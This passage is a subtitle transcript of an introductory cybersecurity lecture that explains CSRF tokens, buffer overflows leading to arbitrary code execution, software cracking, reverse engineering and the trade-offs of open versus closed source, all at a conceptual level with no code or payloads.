01:24:14,040 --> 01:24:17,640 these cross-site request forgeries, whether implemented 1595 01:24:17,640 --> 01:24:21,390 using GET with simple URLs or even implemented 1596 01:24:21,390 --> 01:24:24,660 with POST using actual forms? 1597 01:24:24,660 --> 01:24:28,410 AUDIENCE: How can AI model and quantum computing change the way 1598 01:24:28,410 --> 01:24:31,043 that we look at cyber security? 1599 01:24:31,043 --> 01:24:32,460 DAVID J. MALAN: Quantum computing? 1600 01:24:32,460 --> 01:24:34,860 Let me address that another time because I daresay that's 1601 01:24:34,860 --> 01:24:36,840 a bit far from today's goals. 1602 01:24:36,840 --> 01:24:42,300 But quantum computing is bad if the bad guys have it and you and I don't. 1603 01:24:42,300 --> 01:24:43,590 I'll put it that way. 1604 01:24:43,590 --> 01:24:46,080 All right, so how can we defend against this threat 1605 01:24:46,080 --> 01:24:49,860 even when there's JavaScript code automatically inducing 1606 01:24:49,860 --> 01:24:52,590 submission of these forms, which have enough information in them 1607 01:24:52,590 --> 01:24:54,870 in order to buy something on our behalf? 1608 01:24:54,870 --> 01:25:00,120 Well, it turns out that we could include something like a special token. 1609 01:25:00,120 --> 01:25:04,380 And it turns out a common way to address this problem is by having the server 1610 01:25:04,380 --> 01:25:07,230 not just output a simple HTML form but to output 1611 01:25:07,230 --> 01:25:12,980 an HTML form that additionally has another value, often hidden as well. 1612 01:25:12,980 --> 01:25:17,200 And by convention, in some worlds, it's called the CSRF token, which is just 1613 01:25:17,200 --> 01:25:19,370 a fancy way of saying an extra value. 1614 01:25:19,370 --> 01:25:21,820 But its value is typically meant to be random. 1615 01:25:21,820 --> 01:25:25,600 And I've chosen something fairly pronounceable here, "1234abcd," 1616 01:25:25,600 --> 01:25:29,225 but assume that that value is randomly generated by the server. 1617 01:25:29,225 --> 01:25:31,850 And it might have a bunch of numbers, a bunch of letters in it. 1618 01:25:31,850 --> 01:25:35,050 But the point is that it's randomly generated by the server. 1619 01:25:35,050 --> 01:25:36,920 Now, why is this important? 1620 01:25:36,920 --> 01:25:42,400 The implication of this mechanism, by having a web server output not 1621 01:25:42,400 --> 01:25:48,430 only the product ID and also the button inside of a form 1622 01:25:48,430 --> 01:25:51,190 that they might be using to implement this Buy Now feature-- 1623 01:25:51,190 --> 01:25:53,890 the point is that the server should also be generating 1624 01:25:53,890 --> 01:25:58,210 some secret, randomly generated piece of information in that server 1625 01:25:58,210 --> 01:26:00,440 as well, in that HTML as well. 1626 01:26:00,440 --> 01:26:03,190 And the server should remember that value 1627 01:26:03,190 --> 01:26:06,520 as by using its own database or some other mechanism. 1628 01:26:06,520 --> 01:26:11,440 The point here, though, is that only the server, amazon.com in this case, 1629 01:26:11,440 --> 01:26:15,400 knows what that value should be for you, a specific user. 1630 01:26:15,400 --> 01:26:20,200 And so an adversary, even if they trick you into visiting their website, 1631 01:26:20,200 --> 01:26:22,910 where they have HTML that looks quite like this-- 1632 01:26:22,910 --> 01:26:25,750 the adversary, unless they've hacked amazon.com, 1633 01:26:25,750 --> 01:26:27,610 which is not part of this story-- 1634 01:26:27,610 --> 01:26:32,740 they would have no idea what this random value is that amazon.com 1635 01:26:32,740 --> 01:26:35,628 is using for your Buy Now buttons, because again, 1636 01:26:35,628 --> 01:26:37,420 if it's just an adversary on the internet-- 1637 01:26:37,420 --> 01:26:38,980 they haven't taken over amazon.com. 1638 01:26:38,980 --> 01:26:41,680 They haven't taken over your computer itself. 1639 01:26:41,680 --> 01:26:46,300 They are just trying to trick you into visiting a web page of their own 1640 01:26:46,300 --> 01:26:47,740 that has HTML like this. 1641 01:26:47,740 --> 01:26:49,820 They won't know what value to put there. 1642 01:26:49,820 --> 01:26:51,850 Now, they can try to guess, and maybe they 1643 01:26:51,850 --> 01:26:57,040 could guess "1234abcd," but assuming it's more random than that, the odds 1644 01:26:57,040 --> 01:27:01,660 that that adversary guesses your CSRF token value is 1645 01:27:01,660 --> 01:27:04,960 just so small and low probability that it's just not 1646 01:27:04,960 --> 01:27:07,250 going to happen realistically. 1647 01:27:07,250 --> 01:27:11,380 So now, even if you visit a web page that contains this HTML, even if it 1648 01:27:11,380 --> 01:27:13,930 has some JavaScript that automatically submits the form, 1649 01:27:13,930 --> 01:27:17,410 because the adversary doesn't know the value of this CSRF token, 1650 01:27:17,410 --> 01:27:21,400 amazon.com can just ignore the request to buy that product now. 1651 01:27:21,400 --> 01:27:23,320 And they can throw up an error message or say 1652 01:27:23,320 --> 01:27:25,040 something went wrong or the like. 1653 01:27:25,040 --> 01:27:28,120 But the point is that only the real amazon.com 1654 01:27:28,120 --> 01:27:33,040 should be able to generate and remember this CSRF token value. 1655 01:27:33,040 --> 01:27:36,310 And so therefore, they can validate server-side 1656 01:27:36,310 --> 01:27:40,120 that it's indeed you who intends to buy something now. 1657 01:27:40,120 --> 01:27:43,580 The adversary-- if they put a blank value there or any other value, 1658 01:27:43,580 --> 01:27:45,880 it's not going to be validated server-side 1659 01:27:45,880 --> 01:27:47,650 because the server realizes, uh-uh. 1660 01:27:47,650 --> 01:27:49,600 That's not the value I'm using for David. 1661 01:27:49,600 --> 01:27:52,310 That's not the value I'm using for you. 1662 01:27:52,310 --> 01:27:53,920 So this is a very common technique. 1663 01:27:53,920 --> 01:27:56,110 It does require a bit more complexity on the server. 1664 01:27:56,110 --> 01:27:58,360 Very often, programming languages, like Python, 1665 01:27:58,360 --> 01:28:01,170 will come with libraries, third-party libraries or code 1666 01:28:01,170 --> 01:28:02,920 that other people have written, that allow 1667 01:28:02,920 --> 01:28:06,220 you to add this functionality to your own software. 1668 01:28:06,220 --> 01:28:08,530 But you have to know that the threat exists, 1669 01:28:08,530 --> 01:28:11,860 and you have to look for a solution there too 1670 01:28:11,860 --> 01:28:16,270 or implement it yourself if need be, but almost always as a library 1671 01:28:16,270 --> 01:28:17,630 the answer to this problem. 1672 01:28:17,630 --> 01:28:20,500 There's another way you can solve this same problem, which doesn't 1673 01:28:20,500 --> 01:28:22,570 involve outputting any HTML at all. 1674 01:28:22,570 --> 01:28:25,420 It is also possible to send these kinds of tokens 1675 01:28:25,420 --> 01:28:28,840 as HTTP headers as well, as might commonly 1676 01:28:28,840 --> 01:28:32,200 be the case when a website is very heavily using JavaScript 1677 01:28:32,200 --> 01:28:36,580 and is using JavaScript to talk directly to a server without even any HTML. 1678 01:28:36,580 --> 01:28:41,300 Well, the same values can be sent via this other mechanism as well. 1679 01:28:41,300 --> 01:28:45,670 So if you're interested in these kinds of web-centric attacks especially, 1680 01:28:45,670 --> 01:28:49,750 you might find it interesting to explore the Open Worldwide Application Security 1681 01:28:49,750 --> 01:28:54,220 Project, which has documentation of, discussion of, recommendations 1682 01:28:54,220 --> 01:28:58,148 for all of these kinds of web-centric attacks and more. 1683 01:28:58,148 --> 01:29:00,440 For now, though, let's go ahead and take a short break. 1684 01:29:00,440 --> 01:29:02,380 And when we come back, we'll look at problems 1685 01:29:02,380 --> 01:29:05,650 that go beyond the world of the web, specifically to software 1686 01:29:05,650 --> 01:29:10,140 that you might have running on your own Macs, PCs, or phones. 1687 01:29:10,140 --> 01:29:11,650 All right, we're back. 1688 01:29:11,650 --> 01:29:15,210 Let's now consider a class of attacks that is particularly common when 1689 01:29:15,210 --> 01:29:19,530 it comes to software that's running on your own Mac or your PC or your phone, 1690 01:29:19,530 --> 01:29:21,410 so not web based, but local instead. 1691 01:29:21,410 --> 01:29:23,160 And the first of those is generally called 1692 01:29:23,160 --> 01:29:26,910 arbitrary code execution, the potential for an adversary 1693 01:29:26,910 --> 01:29:32,910 to somehow trick your own computer into executing code that you, the adversary, 1694 01:29:32,910 --> 01:29:36,780 have written and that's not embedded in the actual software that's 1695 01:29:36,780 --> 01:29:38,020 meant to execute it. 1696 01:29:38,020 --> 01:29:42,090 This is an example more generally of what might be called a remote code 1697 01:29:42,090 --> 01:29:45,420 execution, whereby the same attack can happen even if the adversary is 1698 01:29:45,420 --> 01:29:47,550 somewhere else in the world, perhaps connected 1699 01:29:47,550 --> 01:29:50,100 to you somehow via the internet. 1700 01:29:50,100 --> 01:29:52,530 And how might these attacks be possible? 1701 01:29:52,530 --> 01:29:56,940 Very, very common mechanism for waging these kinds of attacks whereby 1702 01:29:56,940 --> 01:30:01,530 an adversary tricks your own system into executing code that the adversary wrote 1703 01:30:01,530 --> 01:30:04,170 is through something generally known as a buffer overflow. 1704 01:30:04,170 --> 01:30:05,920 Now, to be fair, this is a topic you would 1705 01:30:05,920 --> 01:30:09,120 explore in more detail in a class on programming 1706 01:30:09,120 --> 01:30:11,320 specifically, computer science more generally. 1707 01:30:11,320 --> 01:30:13,270 But we'll give you a high-level sense of what 1708 01:30:13,270 --> 01:30:16,840 the threat is as it relates to software that might very well be 1709 01:30:16,840 --> 01:30:18,950 running on your own computer. 1710 01:30:18,950 --> 01:30:20,860 So what is a buffer overflow? 1711 01:30:20,860 --> 01:30:23,410 Well, for this, we need a mental model for what's 1712 01:30:23,410 --> 01:30:26,140 going on inside of your computer when running a program. 1713 01:30:26,140 --> 01:30:29,170 And when you double-click a program on your Mac or PC or your phone, 1714 01:30:29,170 --> 01:30:32,470 and it opens up and loads into the computer's memory, 1715 01:30:32,470 --> 01:30:35,770 the memory, you can think of, is this big, rectangular region 1716 01:30:35,770 --> 01:30:39,070 that represents all of the bytes or megabytes or gigabytes 1717 01:30:39,070 --> 01:30:41,650 that are in your Mac, your PC, or your phone. 1718 01:30:41,650 --> 01:30:44,290 And the computer, or device, more generally, 1719 01:30:44,290 --> 01:30:47,300 uses different parts of this memory for different purposes. 1720 01:30:47,300 --> 01:30:50,200 And this is just because humans came up with conventions years ago 1721 01:30:50,200 --> 01:30:53,770 to lay out the computer's memory in this way-- using some of it 1722 01:30:53,770 --> 01:30:56,110 up here for one purpose, using some of the memory 1723 01:30:56,110 --> 01:30:58,640 down here for another purpose instead. 1724 01:30:58,640 --> 01:31:01,870 So, for instance, if this big rectangle represents 1725 01:31:01,870 --> 01:31:05,440 your phone or your computer's memory, let me just propose that, 1726 01:31:05,440 --> 01:31:07,570 at the top of it, so to speak-- although memory 1727 01:31:07,570 --> 01:31:09,820 doesn't have a top, bottom, left, or right because it totally 1728 01:31:09,820 --> 01:31:11,195 depends on how you're holding it. 1729 01:31:11,195 --> 01:31:14,440 But assume conceptually that at the top of your computer's memory 1730 01:31:14,440 --> 01:31:17,470 is the machine code for the program you're running. 1731 01:31:17,470 --> 01:31:21,760 So long story short, when you write software, at the end of the day, 1732 01:31:21,760 --> 01:31:23,590 zeros and ones are involved. 1733 01:31:23,590 --> 01:31:27,070 And the zeros and ones represent the instructions or commands 1734 01:31:27,070 --> 01:31:30,100 that that software wants to execute on your computer. 1735 01:31:30,100 --> 01:31:34,210 When you click an icon or double-click an icon and load a program into memory, 1736 01:31:34,210 --> 01:31:38,410 the actual program's machine code-- the zeros and ones, if you will-- 1737 01:31:38,410 --> 01:31:41,140 are stored up here in your computer's memory. 1738 01:31:41,140 --> 01:31:44,320 Meanwhile, while a program is running, it 1739 01:31:44,320 --> 01:31:47,380 might need more or less additional memory 1740 01:31:47,380 --> 01:31:50,092 as it executes instructions therein. 1741 01:31:50,092 --> 01:31:51,050 So what does this mean? 1742 01:31:51,050 --> 01:31:53,680 Well, if the program is prompting you for input 1743 01:31:53,680 --> 01:31:56,260 or if it needs to load a new level from a game, 1744 01:31:56,260 --> 01:31:57,910 it might need more and more memory. 1745 01:31:57,910 --> 01:32:00,260 But eventually, it might not need that memory anymore. 1746 01:32:00,260 --> 01:32:02,260 So the memory requirements of a program tend 1747 01:32:02,260 --> 01:32:05,770 to go up and down all the time based on what you, the human, 1748 01:32:05,770 --> 01:32:09,760 are doing with the software and based on what the software is designed to do. 1749 01:32:09,760 --> 01:32:12,940 So computers typically use this bottom area 1750 01:32:12,940 --> 01:32:16,540 of the computer's memory for a so-called stack, very similar in spirit 1751 01:32:16,540 --> 01:32:19,090 to any physical thing that you might stack one 1752 01:32:19,090 --> 01:32:23,680 on top of the other, like clothes in a closet or trays in a cafeteria. 1753 01:32:23,680 --> 01:32:26,650 Stacking means literally from bottom on up. 1754 01:32:26,650 --> 01:32:29,500 But the weird thing is about a computer's memory 1755 01:32:29,500 --> 01:32:32,530 is that, by convention, when the computer needs memory, 1756 01:32:32,530 --> 01:32:35,540 it first uses some memory from the very bottom. 1757 01:32:35,540 --> 01:32:38,590 And then if it needs more, it uses more above that. 1758 01:32:38,590 --> 01:32:41,480 When it needs more, it uses more above that. 1759 01:32:41,480 --> 01:32:45,220 So instead of just going top to bottom, it actually deliberately, by design, 1760 01:32:45,220 --> 01:32:48,200 goes bottom up for reasons we won't get into in this course. 1761 01:32:48,200 --> 01:32:53,140 But just take on faith that, indeed, this stack of memory grows upward. 1762 01:32:53,140 --> 01:32:57,610 The catch, though, is that sometimes software doesn't necessarily 1763 01:32:57,610 --> 01:33:02,980 know in advance or predict correctly in advance how much input you, the human, 1764 01:33:02,980 --> 01:33:03,670 might give it. 1765 01:33:03,670 --> 01:33:05,650 So, for instance, a computer program might 1766 01:33:05,650 --> 01:33:08,770 decide to take up this much memory at the bottom 1767 01:33:08,770 --> 01:33:10,990 but then not realize that, oh, wait a minute, what 1768 01:33:10,990 --> 01:33:15,490 if the human timescale in a really long name or a really long essay or just 1769 01:33:15,490 --> 01:33:19,540 gives me more keystrokes as input than I, the programmer who 1770 01:33:19,540 --> 01:33:21,220 wrote this software, anticipated? 1771 01:33:21,220 --> 01:33:23,590 That might mean that even as you allocate 1772 01:33:23,590 --> 01:33:27,250 what are called frames of memory on this stack, 1773 01:33:27,250 --> 01:33:31,090 the user's input might not stay confined to that particular frame. 1774 01:33:31,090 --> 01:33:33,790 If they type in too many characters at their keyboard, what's 1775 01:33:33,790 --> 01:33:37,010 supposed to go here might end up going down here, 1776 01:33:37,010 --> 01:33:39,890 so overflowing these frames of memory. 1777 01:33:39,890 --> 01:33:42,610 So the computer or the programmer makes hopefully 1778 01:33:42,610 --> 01:33:45,610 an educated guess as to how much input the user might have. 1779 01:33:45,610 --> 01:33:48,280 But if they're wrong, that input might be too tall 1780 01:33:48,280 --> 01:33:52,120 and therefore overlap other parts of the computer's memory. 1781 01:33:52,120 --> 01:33:53,980 Now, there are ways to defend against this. 1782 01:33:53,980 --> 01:33:56,470 So the scenario we're worried about here is often 1783 01:33:56,470 --> 01:33:59,140 when programmers don't know how to anticipate this 1784 01:33:59,140 --> 01:34:03,070 or when you are using software written by programmers who didn't anticipate 1785 01:34:03,070 --> 01:34:05,630 or implement the solution properly. 1786 01:34:05,630 --> 01:34:07,160 So what might go wrong? 1787 01:34:07,160 --> 01:34:09,480 Well, for instance, when a program first starts 1788 01:34:09,480 --> 01:34:12,690 running, one of the first things it does if it's 1789 01:34:12,690 --> 01:34:16,950 calling another routine or another function, when you click on a button, 1790 01:34:16,950 --> 01:34:19,020 when you start typing keystrokes, the computer 1791 01:34:19,020 --> 01:34:21,150 might start using some of this memory, and it 1792 01:34:21,150 --> 01:34:23,675 might be moving around among these zeros and ones, 1793 01:34:23,675 --> 01:34:25,050 executing different instructions. 1794 01:34:25,050 --> 01:34:27,600 If you click this menu option, it'll use this code. 1795 01:34:27,600 --> 01:34:31,170 If you click on this menu option, it'll use this code. 1796 01:34:31,170 --> 01:34:33,060 So in other words, the computer logically 1797 01:34:33,060 --> 01:34:35,850 is kind of moving around among all those zeros and ones 1798 01:34:35,850 --> 01:34:38,500 and executing them accordingly. 1799 01:34:38,500 --> 01:34:42,160 So one of the first things your computer does when a program is running 1800 01:34:42,160 --> 01:34:45,970 is it just jots down at the bottom of the computer's memory 1801 01:34:45,970 --> 01:34:49,433 what is the address to which I should return after doing this. 1802 01:34:49,433 --> 01:34:52,350 So it's kind of like in the real world, if you go off and do something 1803 01:34:52,350 --> 01:34:55,560 over there, eventually, you want to remember to come back over here 1804 01:34:55,560 --> 01:34:57,000 to pick up where you left off. 1805 01:34:57,000 --> 01:34:58,800 And that's what we mean by return address. 1806 01:34:58,800 --> 01:35:00,960 It's a little reminder to yourself that, no matter 1807 01:35:00,960 --> 01:35:02,820 what you go off and do right now, you got 1808 01:35:02,820 --> 01:35:05,340 to come back and resume where you left off. 1809 01:35:05,340 --> 01:35:07,530 And what this return address then does is 1810 01:35:07,530 --> 01:35:12,870 it refers to some specific location in the machine code, some specific pattern 1811 01:35:12,870 --> 01:35:15,810 of zeros and ones that eventually the software should come back 1812 01:35:15,810 --> 01:35:18,240 to pick up when the user leaves off. 1813 01:35:18,240 --> 01:35:22,740 So, for instance, if you open the File menu and go to Print, 1814 01:35:22,740 --> 01:35:25,170 and you go through the steps of printing a document, 1815 01:35:25,170 --> 01:35:28,440 the return address might be to go back to whatever 1816 01:35:28,440 --> 01:35:32,192 you were doing in that document before you initiated the print command. 1817 01:35:32,192 --> 01:35:34,650 So the software is constantly jumping around in this sense. 1818 01:35:34,650 --> 01:35:38,190 Suppose now that the user clicks some button within the software 1819 01:35:38,190 --> 01:35:39,330 to search for something. 1820 01:35:39,330 --> 01:35:40,590 Maybe it's cats. 1821 01:35:40,590 --> 01:35:43,650 Well, because this is a new function that's being called, 1822 01:35:43,650 --> 01:35:46,740 the search function, what the computer might do inside of its memory 1823 01:35:46,740 --> 01:35:49,380 is this-- it might put a little note to self to say, 1824 01:35:49,380 --> 01:35:53,700 go back to this location in the machine code once the user is done searching, 1825 01:35:53,700 --> 01:35:55,740 just like the user might be done printing. 1826 01:35:55,740 --> 01:35:57,900 And then suppose the user types in "cats." 1827 01:35:57,900 --> 01:36:00,180 Well, "cats" is stored in the computer's memory 1828 01:36:00,180 --> 01:36:03,990 just above this frame on the stack because, again, I said, by convention, 1829 01:36:03,990 --> 01:36:08,020 whenever the software uses memory, it starts at the bottom then goes up, 1830 01:36:08,020 --> 01:36:09,540 then goes up, then goes up. 1831 01:36:09,540 --> 01:36:13,510 So after now this software is done searching itself for cats, 1832 01:36:13,510 --> 01:36:16,967 then that frame on the stack is sort of removed because we 1833 01:36:16,967 --> 01:36:18,550 don't need to know about cats anymore. 1834 01:36:18,550 --> 01:36:19,880 We're done searching for them. 1835 01:36:19,880 --> 01:36:22,900 So the last thing in memory is this reminder, go to machine code. 1836 01:36:22,900 --> 01:36:26,650 And this is how the software knows to go back to a particular location in code, 1837 01:36:26,650 --> 01:36:29,980 where maybe it's just sitting there waiting for me to click some other menu 1838 01:36:29,980 --> 01:36:31,660 option instead. 1839 01:36:31,660 --> 01:36:35,320 But what if an adversary is the one at the keyboard, so to speak, 1840 01:36:35,320 --> 01:36:38,770 and it's not a good user just typing in short phrases like "cats," 1841 01:36:38,770 --> 01:36:41,750 but maybe it's an adversary who's typing something more? 1842 01:36:41,750 --> 01:36:45,400 So suppose that an adversary actually pulls up the search feature. 1843 01:36:45,400 --> 01:36:47,230 And in general, therefore, the software is 1844 01:36:47,230 --> 01:36:49,313 going to remember to put the return address there, 1845 01:36:49,313 --> 01:36:52,930 so specifically something like "go to" this location in the machine code. 1846 01:36:52,930 --> 01:36:55,840 But suppose that the adversary doesn't type in "cats," 1847 01:36:55,840 --> 01:37:00,010 doesn't type in "dogs," but types in, for the sake of discussion, 1848 01:37:00,010 --> 01:37:04,580 some pattern of zeros and ones that represents actual code. 1849 01:37:04,580 --> 01:37:06,520 Maybe it's the pattern of zeros and ones that 1850 01:37:06,520 --> 01:37:09,280 represents, delete everything from a server, 1851 01:37:09,280 --> 01:37:11,530 or start sending emails or the like. 1852 01:37:11,530 --> 01:37:15,220 Or maybe, more cleverly, maybe it means skip 1853 01:37:15,220 --> 01:37:20,080 whatever menu keeps prompting me to register or activate my software. 1854 01:37:20,080 --> 01:37:22,870 In other words, the adversary wants to trick this software 1855 01:37:22,870 --> 01:37:26,025 into running zeros and ones that didn't come with the software. 1856 01:37:26,025 --> 01:37:28,900 Now, in practice, you can't just type zeros and ones at the keyboard. 1857 01:37:28,900 --> 01:37:31,753 It would be a different way that the adversary inputs this data. 1858 01:37:31,753 --> 01:37:34,420 But for the sake of discussion, assume that the adversary is not 1859 01:37:34,420 --> 01:37:37,060 typing in "cats" but is typing in the zeros and ones. 1860 01:37:37,060 --> 01:37:39,730 And they know enough about binary, zeros and ones, 1861 01:37:39,730 --> 01:37:42,220 that they know what patterns to choose. 1862 01:37:42,220 --> 01:37:45,280 Now suppose that this code, this so-called attack code, 1863 01:37:45,280 --> 01:37:51,640 is way longer than C-A-T-S, and it's many more characters or bytes long. 1864 01:37:51,640 --> 01:37:54,970 It is possible, by definition of how memory is used, that this attack 1865 01:37:54,970 --> 01:37:57,190 code might be so big that it takes up not only 1866 01:37:57,190 --> 01:37:59,590 this space that's been allocated for it, but it 1867 01:37:59,590 --> 01:38:02,920 overflows other things in memory. 1868 01:38:02,920 --> 01:38:06,400 You can now think of this frame, this rectangular region 1869 01:38:06,400 --> 01:38:10,090 on the stack to which I keep referring, as like a buffer, a room 1870 01:38:10,090 --> 01:38:11,720 for some amount of information. 1871 01:38:11,720 --> 01:38:14,470 But if the adversary provides so much information, so much 1872 01:38:14,470 --> 01:38:17,500 attack code, zeros and ones, that it overflows that buffer, 1873 01:38:17,500 --> 01:38:20,620 it might actually overwrite that note to self 1874 01:38:20,620 --> 01:38:23,740 with dot, dot, dot, something else. 1875 01:38:23,740 --> 01:38:28,210 And what's clever here, though, is that if the adversary is smart enough-- 1876 01:38:28,210 --> 01:38:30,970 and this is often through lots and lots of trial and error. 1877 01:38:30,970 --> 01:38:32,950 They don't often just get it the first time. 1878 01:38:32,950 --> 01:38:35,720 If the adversary is ultimately clever enough, 1879 01:38:35,720 --> 01:38:39,250 they can actually put not just some random zeros and ones there, 1880 01:38:39,250 --> 01:38:43,840 but they can put the equivalent of a note to self that says, 1881 01:38:43,840 --> 01:38:46,220 "go to attack code." 1882 01:38:46,220 --> 01:38:48,580 In other words, instead of typing in "cats," 1883 01:38:48,580 --> 01:38:50,830 they type in two things that are pretty long. 1884 01:38:50,830 --> 01:38:54,040 One are the zeros and ones that represent some form of attack, 1885 01:38:54,040 --> 01:38:57,890 like circumvent the registration or the activation for the software 1886 01:38:57,890 --> 01:39:01,390 so I can use it for free, or do something else that's malicious. 1887 01:39:01,390 --> 01:39:04,600 And if the second thing they provide in just so 1888 01:39:04,600 --> 01:39:09,000 happens to be cleverly the address of their own attack code, which 1889 01:39:09,000 --> 01:39:12,060 they can figure out mathematically perhaps through trial and error, 1890 01:39:12,060 --> 01:39:15,060 the adversary can trick the computer into not 1891 01:39:15,060 --> 01:39:16,890 going back up here and running the machine 1892 01:39:16,890 --> 01:39:18,660 code that came with the software. 1893 01:39:18,660 --> 01:39:22,320 The adversary can trick the software into executing code 1894 01:39:22,320 --> 01:39:26,070 that the adversary themselves injected. 1895 01:39:26,070 --> 01:39:27,480 Now, what does that mean? 1896 01:39:27,480 --> 01:39:31,230 If you are running the software under your user name, whatever 1897 01:39:31,230 --> 01:39:35,500 you can do on the software and the system, be it your Mac or PC or phone, 1898 01:39:35,500 --> 01:39:37,770 so now can the adversary. 1899 01:39:37,770 --> 01:39:40,350 And maybe they'll now delete all of your files. 1900 01:39:40,350 --> 01:39:43,290 Maybe they will now all register the software. 1901 01:39:43,290 --> 01:39:44,970 Maybe they will now start sending spam. 1902 01:39:44,970 --> 01:39:51,190 Anything at all is possible based on what the adversary has passed in here. 1903 01:39:51,190 --> 01:39:55,140 So if you've ever heard of a website called stackoverflow.com, 1904 01:39:55,140 --> 01:39:58,260 which is a popular website for programmers to ask questions and get 1905 01:39:58,260 --> 01:40:01,050 answers of a community, that specifically 1906 01:40:01,050 --> 01:40:06,330 is the allusion to exactly this kind of bug or mistake, 1907 01:40:06,330 --> 01:40:10,920 whereby, if not programmed properly, the stack can overflow. 1908 01:40:10,920 --> 01:40:14,520 And if the software or programmer does not anticipate or detect it, 1909 01:40:14,520 --> 01:40:16,120 bad things can happen. 1910 01:40:16,120 --> 01:40:18,600 You can have arbitrary code executed, or you 1911 01:40:18,600 --> 01:40:22,620 can have remote code executed if the adversary isn't even at that keyboard 1912 01:40:22,620 --> 01:40:27,090 but is somehow sending this code into your software via some network 1913 01:40:27,090 --> 01:40:27,840 connection. 1914 01:40:27,840 --> 01:40:30,772 What then might this mean? 1915 01:40:30,772 --> 01:40:32,730 So if you've ever heard of the term "cracking," 1916 01:40:32,730 --> 01:40:36,630 which typically refers to figuring out someone's password or, in this case, 1917 01:40:36,630 --> 01:40:39,450 breaking into software, cracking might refer 1918 01:40:39,450 --> 01:40:42,330 to eliminating the need for a serial number 1919 01:40:42,330 --> 01:40:45,000 or an activation code or the like, because if you 1920 01:40:45,000 --> 01:40:49,740 can inject any code that you want into someone's software, 1921 01:40:49,740 --> 01:40:53,220 you could tell that software to just skip the lines of code, the zeros 1922 01:40:53,220 --> 01:40:56,340 and ones that represent asking you for that activation code, 1923 01:40:56,340 --> 01:40:59,520 or they can do something much more malicious. 1924 01:40:59,520 --> 01:41:02,640 So this is an example, in some sense, of what we might also 1925 01:41:02,640 --> 01:41:04,110 call reverse engineering. 1926 01:41:04,110 --> 01:41:07,020 Reverse engineering refers to the ability for someone 1927 01:41:07,020 --> 01:41:10,590 to figure out how something was engineered, how it was built. 1928 01:41:10,590 --> 01:41:12,780 Now, at the end of the day, most of the software 1929 01:41:12,780 --> 01:41:15,690 that you and I install on our Macs or PCs or phones 1930 01:41:15,690 --> 01:41:17,790 is pretty much just zeros and ones. 1931 01:41:17,790 --> 01:41:22,120 So it's very nonobvious to an adversary even what is actually going on. 1932 01:41:22,120 --> 01:41:25,410 But with certain techniques, with certain trial and error, 1933 01:41:25,410 --> 01:41:28,620 they can actually figure out what those zeros and ones represent. 1934 01:41:28,620 --> 01:41:31,560 And depending on the language that was used to generate that software, 1935 01:41:31,560 --> 01:41:34,290 they might be able to glean even more information than that. 1936 01:41:34,290 --> 01:41:37,710 Now, there's a good side of reverse engineering, whereby 1937 01:41:37,710 --> 01:41:41,700 if you and I are in the business of figuring out 1938 01:41:41,700 --> 01:41:45,360 how malware was implemented so that you and I can contribute solutions 1939 01:41:45,360 --> 01:41:47,400 to antivirus software and the like, well, 1940 01:41:47,400 --> 01:41:50,730 malware analysis uses these same kinds of techniques, 1941 01:41:50,730 --> 01:41:54,750 trying to figure out what's going on underneath the hood of software 1942 01:41:54,750 --> 01:41:57,780 as by reverse engineering it, so using trial and error, 1943 01:41:57,780 --> 01:42:00,000 maybe injecting some code of our own, to figure out 1944 01:42:00,000 --> 01:42:05,760 exactly what instructions are embedded among all of those zeros and ones. 1945 01:42:05,760 --> 01:42:10,530 Now, how might you hedge against these kinds of threats of remote code 1946 01:42:10,530 --> 01:42:14,040 execution, arbitrary code execution, with software of your own? 1947 01:42:14,040 --> 01:42:17,640 Well, you could start using open-source software, for instance. 1948 01:42:17,640 --> 01:42:21,820 Open-source software just means that the code that implements that software, 1949 01:42:21,820 --> 01:42:28,500 be it in Python or PHP or Java or C# or C++ or any number of other languages is 1950 01:42:28,500 --> 01:42:29,550 itself open source. 1951 01:42:29,550 --> 01:42:31,800 That is, you and I and anyone on the internet 1952 01:42:31,800 --> 01:42:35,700 typically can read the source code and see exactly what instructions will 1953 01:42:35,700 --> 01:42:37,950 be executed on your computer or phone. 1954 01:42:37,950 --> 01:42:41,370 Now, that doesn't necessarily mean that the version 1955 01:42:41,370 --> 01:42:44,820 of the software that you are running is exactly 1956 01:42:44,820 --> 01:42:46,470 the same as the open-source version. 1957 01:42:46,470 --> 01:42:49,290 There's still a threat whereby the code might be open source, 1958 01:42:49,290 --> 01:42:52,170 but maybe you were tricked via some phishing email 1959 01:42:52,170 --> 01:42:54,600 or some malicious website into installing 1960 01:42:54,600 --> 01:42:58,750 a fake version of some software that actually has malicious code in it. 1961 01:42:58,750 --> 01:43:01,120 So malware might still be a problem. 1962 01:43:01,120 --> 01:43:03,630 But a lot of folks think that open source 1963 01:43:03,630 --> 01:43:05,730 tends to be a good thing because you can audit-- 1964 01:43:05,730 --> 01:43:07,740 smart people on the internet can audit the code 1965 01:43:07,740 --> 01:43:11,570 and make sure that there are no "backdoors" or malicious instructions 1966 01:43:11,570 --> 01:43:14,870 that might do things that you wouldn't expect the software to do. 1967 01:43:14,870 --> 01:43:18,230 Now, again, that's not necessarily the case that the version you're running 1968 01:43:18,230 --> 01:43:20,390 doesn't still have some form of infection. 1969 01:43:20,390 --> 01:43:23,000 But this might give you at least a bit more reassurance. 1970 01:43:23,000 --> 01:43:27,110 Now the flip side, though, is that if code is open source, even if it's 1971 01:43:27,110 --> 01:43:29,150 devoid of anything malicious, it might still 1972 01:43:29,150 --> 01:43:33,560 have bugs, mistakes, that human programmers accidentally made, 1973 01:43:33,560 --> 01:43:37,400 which might very well make open-source software, or any software, 1974 01:43:37,400 --> 01:43:39,090 vulnerable to attack. 1975 01:43:39,090 --> 01:43:45,080 I mean, you're literally giving the adversaries the plans to your software. 1976 01:43:45,080 --> 01:43:47,390 It's like the plans to the Death Star in Star Wars, 1977 01:43:47,390 --> 01:43:49,370 such that they can probably figure out what 1978 01:43:49,370 --> 01:43:52,250 the weaknesses are in your software because you're 1979 01:43:52,250 --> 01:43:54,410 giving them the blueprint therefore. 1980 01:43:54,410 --> 01:43:57,020 So an alternative to open-source software 1981 01:43:57,020 --> 01:43:59,790 is perhaps the default, which is closed-source software. 1982 01:43:59,790 --> 01:44:02,420 So any software that you might download or buy from companies 1983 01:44:02,420 --> 01:44:04,700 that it's not open source is typically closed 1984 01:44:04,700 --> 01:44:08,180 source, which means only they, only their employees, have access to it. 1985 01:44:08,180 --> 01:44:11,410 Now, the downside is that you, the user, do not 1986 01:44:11,410 --> 01:44:13,660 have access to closed-source software. 1987 01:44:13,660 --> 01:44:15,730 Only the authors, therefore, do. 1988 01:44:15,730 --> 01:44:21,370 But the upside, arguably, is that now so do adversaries on 